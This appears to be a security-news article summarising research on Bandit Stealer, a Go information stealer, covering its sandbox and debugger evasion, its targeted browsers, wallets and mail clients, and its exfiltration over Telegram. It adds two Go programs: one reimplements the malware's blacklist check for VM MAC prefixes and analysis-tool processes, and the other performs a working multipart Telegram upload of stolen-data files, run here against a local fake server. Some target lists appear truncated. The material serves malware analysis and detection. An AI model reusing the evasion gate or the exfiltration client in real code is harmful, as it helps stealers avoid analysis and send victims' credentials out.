Zscaler ThreatLabz recently tracked “Bandit Stealer”, a new info-stealer that first appeared in April 2023. It harvests the following data from 17 browsers:-
- Credit cards
Bandit Stealer also swipes credentials from popular FTP and email clients, and it goes after desktop cryptocurrency wallets too.
The malware is written in Go (Golang), and the stolen data is sent to a command-and-control (C2) channel via Telegram. In addition, the malware can detect virtual environments and automated analysis tools and quietly refuse to run in them.
Bandit Stealer evades analysis
The Bandit stealer evades both automated and manual analysis by applying several anti-analysis techniques. It uses the procfs Golang library to collect process information and scans for the following process names:-
- virtual box
When a running process matches one of these names, the Bandit infostealer terminates itself. The latest Bandit samples also check for an attached debugger through the Windows API using the following call:-
- CheckRemoteDebuggerPresent
Bandit obtains the machine UUID and the screen dimensions with the following WMIC commands:-
- wmic csproduct get uuid
- wmic desktopmonitor get screenheight, screenwidth
The gathered information helps the threat actors recognize analysis setups (small or absent monitors and generic UUIDs are typical of sandboxes). To spot virtual environments, evade security vendors and avoid suspicion, Bandit Stealer keeps extensive blacklists of the following:-
- IP addresses
- MAC addresses
- Computer names
- Process names
Bandit retrieves the system’s external IP address from ‘api.ipify.org’ and compares it against an embedded list of blacklisted IP addresses (reproduced in the report’s appendix).
Bandit reads the MAC address via the GetAdaptersAddresses Windows API and compares it against a blacklist from the appendix. If there is a match, Bandit shuts down; MAC address ranges associated with virtualization vendors are blacklisted so that the stealer does not run inside sandboxes.
Apart from this, Bandit Stealer runs “cmd /c net session” and checks the victim’s username and computer name against additional blacklists.
Using the CreateToolhelp32Snapshot Windows API, Bandit takes a snapshot of the running processes and compares it against a process blacklist from the appendix. If a blacklisted process is found running in memory, Bandit terminates.
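The checks above (process snapshot, MAC prefix, external IP, username and computer name, each compared against a blacklist) can be reproduced as one self-check you run inside your own analysis VM to see whether a Bandit-style gate would refuse to execute there. The following Go program is an added example written for this article, not code from the stealer or from the vendor report; the blacklist contents are constructed (the stealer’s real lists are longer), the IP addresses are TEST-NET values, and the MAC prefixes are the well-known VirtualBox and VMware OUIs. Process list and external IP are passed in by the caller because gathering them needs a Windows process snapshot and a network call.

```go
package main

import (
	"fmt"
	"net"
	"os"
	"os/user"
	"strings"
)

// HostFingerprint holds the host attributes a Bandit-style gate compares
// against its blacklists before deciding whether to run.
type HostFingerprint struct {
	Processes  []string // image names from a process snapshot
	MACs       []string // hardware addresses of local adapters
	ExternalIP string   // as returned by api.ipify.org (supplied by caller)
	Username   string
	Hostname   string
}

// Illustrative blacklists, constructed for this example. The MAC prefixes are
// the VirtualBox (08:00:27) and VMware (00:0c:29, 00:50:56, 00:05:69) OUIs;
// the IPs are TEST-NET addresses, not values from the real sample.
var (
	blockedProcesses   = []string{"vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe", "wireshark.exe", "x64dbg.exe", "procmon.exe"}
	blockedMACPrefixes = []string{"08:00:27", "00:0c:29", "00:50:56", "00:05:69"}
	blockedIPs         = map[string]bool{"203.0.113.10": true, "198.51.100.25": true}
	blockedUsers       = []string{"sandbox", "malware", "virus", "john doe"}
	blockedHosts       = []string{"sandbox", "desktop-analysis", "malware-pc"}
)

// inList does a case-insensitive exact match against a blacklist.
func inList(list []string, v string) bool {
	v = strings.ToLower(v)
	for _, x := range list {
		if x == v {
			return true
		}
	}
	return false
}

// Check returns one entry per blacklist hit. An empty result means a
// Bandit-style gate would treat the host as a real victim and continue.
func Check(fp HostFingerprint) []string {
	var hits []string
	for _, p := range fp.Processes {
		if inList(blockedProcesses, p) {
			hits = append(hits, "process:"+p)
		}
	}
	for _, m := range fp.MACs {
		m = strings.ToLower(m)
		for _, pre := range blockedMACPrefixes {
			if strings.HasPrefix(m, pre) {
				hits = append(hits, "mac:"+m)
				break
			}
		}
	}
	if blockedIPs[fp.ExternalIP] {
		hits = append(hits, "ip:"+fp.ExternalIP)
	}
	if inList(blockedUsers, fp.Username) {
		hits = append(hits, "user:"+fp.Username)
	}
	if inList(blockedHosts, fp.Hostname) {
		hits = append(hits, "host:"+fp.Hostname)
	}
	return hits
}

// LocalFingerprint collects what can be read offline and cross-platform:
// adapter MACs, username and hostname. The stealer itself uses
// GetAdaptersAddresses, "net session" and CreateToolhelp32Snapshot on Windows.
func LocalFingerprint(processes []string, externalIP string) HostFingerprint {
	fp := HostFingerprint{Processes: processes, ExternalIP: externalIP}
	if ifaces, err := net.Interfaces(); err == nil {
		for _, i := range ifaces {
			if len(i.HardwareAddr) > 0 {
				fp.MACs = append(fp.MACs, i.HardwareAddr.String())
			}
		}
	}
	fp.Hostname, _ = os.Hostname()
	if u, err := user.Current(); err == nil {
		fp.Username = u.Username
	}
	return fp
}

func main() {
	// Constructed process list and IP; replace with a real snapshot when
	// running inside the analysis VM you want to evaluate.
	fp := LocalFingerprint([]string{"explorer.exe", "VBoxService.exe"}, "203.0.113.10")
	for _, h := range Check(fp) {
		fmt.Println("blacklist hit:", h)
	}
}
```

A sandbox that produces no hits for its own MAC, hostname, username, egress IP and helper processes is one this family would not distinguish from a victim by these checks alone; the WMIC UUID and monitor queries are a separate gate and are not modelled here.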
Below we have listed the browsers targeted by Bandit Stealer:-
- Yandex browser
- Iridium Browser
- 7Star Browser
- Vivaldi Browser
- Google Chrome
- Microsoft Edge
- Torch web browser
- Kometa Browser
- Brave browser
- Amigo Browser
- Epic privacy browser
- SeaMonkey browser
Targeted cryptocurrency wallets
Below we have mentioned the cryptocurrency wallets that Bandit Stealer targets:-
- Coinbase wallet extension
- Saturn Wallet extension
- Binance chain wallet extension
- Coin98 Wallet
- TronLink wallet
- MultiBit Bitcoin wallet
- Terra Station wallet
- Electron Cash
- Guildwallet extension
- MetaMask extension
- Bither Bitcoin Wallet
- Ronin Wallet extension
- MultiDoge wallet
- Cardiachain wallet extension
- Jaxx Liberty wallet
- Dash wallet
- Math Wallet extension
- Bitpay wallet extension
- Handy Wallet extension
- Bytecoin wallet
- Coinomi wallet
- Monero wallet
FTP client apps targeted
Below we have mentioned the FTP client applications that Bandit Stealer targets:-
- Staff FTP
Email clients targeted
Below we have mentioned the email clients that Bandit Stealer targets:-
- Mailbird
- Opera Mail
Stolen data is stored in files under a subfolder of the %appdata%\local folder; the subfolder name follows the [country_code][ip_address] format.
The USERINFO.txt file contains the Bandit Stealer header and system information.
Bandit uses the cURL utility that ships with Windows since Windows 10 v1803 for versatile data transfer over various protocols such as:-
In addition, it downloads its blacklist configuration from a hard-coded URL on “pastebin.com”.
Once data collection is complete, Bandit sends the information to the threat actor via Telegram.
The Telegram API returns a JSON-encoded response, which lets the threat actor parse and extract the stolen data automatically.
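The exfiltration exchange described above, shown from both sides as an added example (not code from the stealer or from the report): a client performs the multipart upload a Telegram Bot API sendDocument call requires, and a local stand-in for api.telegram.org answers with the {"ok":true,"result":{...}} envelope the real API uses, which the client then decodes. The bot token, chat ID and USERINFO.txt payload are constructed; the fake server runs in-process so nothing leaves the machine.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"mime/multipart"
	"net/http"
	"net/http/httptest"
	"strings"
)

// BotResponse is the envelope every Telegram Bot API call returns:
// {"ok":true,"result":{...}} on success, {"ok":false,"description":"..."} otherwise.
type BotResponse struct {
	OK          bool            `json:"ok"`
	Result      json.RawMessage `json:"result"`
	Description string          `json:"description,omitempty"`
}

// SentDocument is the part of a sendDocument result worth checking.
type SentDocument struct {
	Document struct {
		FileName string `json:"file_name"`
		FileSize int    `json:"file_size"`
	} `json:"document"`
}

// NewFakeBotAPI stands in for https://api.telegram.org so the example runs
// offline. It accepts POST /bot<token>/sendDocument with a multipart body.
func NewFakeBotAPI() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Type", "application/json")
		if r.Method != http.MethodPost || !strings.HasPrefix(r.URL.Path, "/bot") || !strings.HasSuffix(r.URL.Path, "/sendDocument") {
			w.WriteHeader(http.StatusNotFound)
			fmt.Fprint(w, `{"ok":false,"description":"Not Found"}`)
			return
		}
		f, hdr, err := r.FormFile("document")
		if err != nil {
			w.WriteHeader(http.StatusBadRequest)
			fmt.Fprint(w, `{"ok":false,"description":"Bad Request: document missing"}`)
			return
		}
		defer f.Close()
		data, _ := io.ReadAll(f)
		var res SentDocument
		res.Document.FileName = hdr.Filename
		res.Document.FileSize = len(data)
		json.NewEncoder(w).Encode(map[string]any{"ok": true, "result": res})
	}))
}

// SendDocument performs the exchange a Telegram-based exfil channel does:
// a multipart upload to /bot<token>/sendDocument, then decoding the JSON reply.
func SendDocument(baseURL, token, chatID, filename string, data []byte) (*BotResponse, error) {
	var body bytes.Buffer
	mw := multipart.NewWriter(&body)
	if err := mw.WriteField("chat_id", chatID); err != nil {
		return nil, err
	}
	part, err := mw.CreateFormFile("document", filename)
	if err != nil {
		return nil, err
	}
	if _, err := part.Write(data); err != nil {
		return nil, err
	}
	if err := mw.Close(); err != nil {
		return nil, err
	}
	resp, err := http.Post(baseURL+"/bot"+token+"/sendDocument", mw.FormDataContentType(), &body)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	var br BotResponse
	if err := json.NewDecoder(resp.Body).Decode(&br); err != nil {
		return nil, err
	}
	return &br, nil
}

func main() {
	srv := NewFakeBotAPI()
	defer srv.Close()
	// Constructed stand-in for USERINFO.txt; real samples upload the collected files.
	payload := []byte("Bandit Stealer\nUUID: 00000000-0000-0000-0000-000000000000\nScreen: 1920x1080\n")
	br, err := SendDocument(srv.URL, "123456:TESTTOKEN", "42", "USERINFO.txt", payload)
	if err != nil {
		panic(err)
	}
	var doc SentDocument
	if err := json.Unmarshal(br.Result, &doc); err != nil {
		panic(err)
	}
	fmt.Printf("ok=%v file=%s size=%d\n", br.OK, doc.Document.FileName, doc.Document.FileSize)
}
```

For detection purposes the observable artefacts are the outbound POST to api.telegram.org with a path of the form /bot<token>/sendDocument and a multipart body carrying chat_id and document fields; a bot token seen in proxy logs can be pulled from that path.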